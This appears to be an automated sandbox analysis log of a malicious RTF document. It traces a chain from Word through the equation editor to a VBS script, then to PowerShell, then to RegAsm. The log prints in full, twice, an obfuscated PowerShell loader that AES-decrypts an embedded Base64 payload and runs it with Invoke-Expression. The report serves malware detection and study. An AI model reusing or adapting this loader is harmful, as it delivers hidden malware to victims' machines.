                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: 4vzwJTZbwT.rtfReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: 4vzwJTZbwT.LNK.0.drLNK file: ..\..\..\..\..\Desktop\4vzwJTZbwT.rtf
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
